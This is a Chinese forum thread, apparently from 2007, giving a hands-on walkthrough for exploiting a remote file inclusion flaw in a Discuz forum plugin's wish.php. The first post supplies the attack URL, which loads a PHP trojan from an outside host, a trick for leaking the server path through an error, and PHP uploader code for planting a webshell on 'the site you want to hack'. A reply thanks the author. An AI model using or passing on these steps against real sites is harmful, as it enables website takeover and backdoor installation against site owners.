服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2007-1-27 21:08:32

discuz论坛的许愿池漏洞

discuz论坛的许愿池插件在DZ根目录有个wish.php文件,文件第四行:&nbsp;<BR><BR>require&nbsp;$discuz_root.'./include/discuzcode.func.php';<BR><BR>很明显程序没有做任何过滤,一个十足的远程包含漏洞,具体利用方法就很简单了:<BR><BR><BR>http://www.xxx.com/wish.php?discuz_root=http://www.520king.com/king.txt?</A><BR><BR>别忘了后面有个问号!xxxx.txt就是我的PHP木马,c99shell不知道为什么,我没成功,也许与操作系统有关,我没仔细去实验了,直接用的安全天使的那PHP后门,不过可以得到一个"webshell",但是用安全天使那PHP后门无法上传我们真正的webshell上去,所以用下面这个文件就可以上传你的WEBSHELL到网站目录,&nbsp;<BR><BR>&lt;?copy($_FILES,"C:\Inetpub\vhosts\baidu.com\bbs\cntink.php");?&gt;<BR><BR>&lt;form&nbsp;ENCTYPE="multipart/form-data"&nbsp;ACTION=""&nbsp;METHOD="POST"&gt;<BR><BR>&lt;input&nbsp;NAME="MyFile"&nbsp;TYPE="file"&gt;<BR><BR>&lt;input&nbsp;VALUE="&nbsp;提交&nbsp;"&nbsp;TYPE="submit"&gt;<BR><BR>&lt;/form&gt;&nbsp;<BR><BR>怎么得到网站实际路径呢?很简单,直接打开http://www.xxx.com/wish.php?discuz_root=http://www.520king.com/king.txt&nbsp;,不要最后那个问号,这时你会发现程序报错了,网站的实际路径也就出来了!修改个文件里的&nbsp;<BR><BR>C:\Inetpub\vhosts\baidu.com\bbs\<BR>为当前你要黑的这个网站实际路径;cntink.php是你上传webshell后需要保存的名字,随便你取什么!<BR>  把上面那文件保存为txt(其他扩展名也可以)上传到你自己的网站,比如我取名为fly.txt,现在再打开&nbsp;<BR><BR>http://www.xxx.com/wish.php?discuz_root=http://www.520king.com/king.txt?</A><BR>OK...看见上传对话框了吧,慢慢上传你的webshell吧!上传后的路径就是你在fly.txt中所设置的路径!<BR>

〓陈三太子〓 发表于 2006-5-18 03:20:02

re:discuz论坛的许愿池漏洞

<P>解释的很详细&nbsp;&nbsp; 我看了教程不明白 一看这图&nbsp; 一目了然</P>
<P>谢谢楼主&nbsp;&nbsp;&nbsp;&nbsp; 真的佩服</P>
页: [1]
查看完整版本: discuz论坛的许愿池漏洞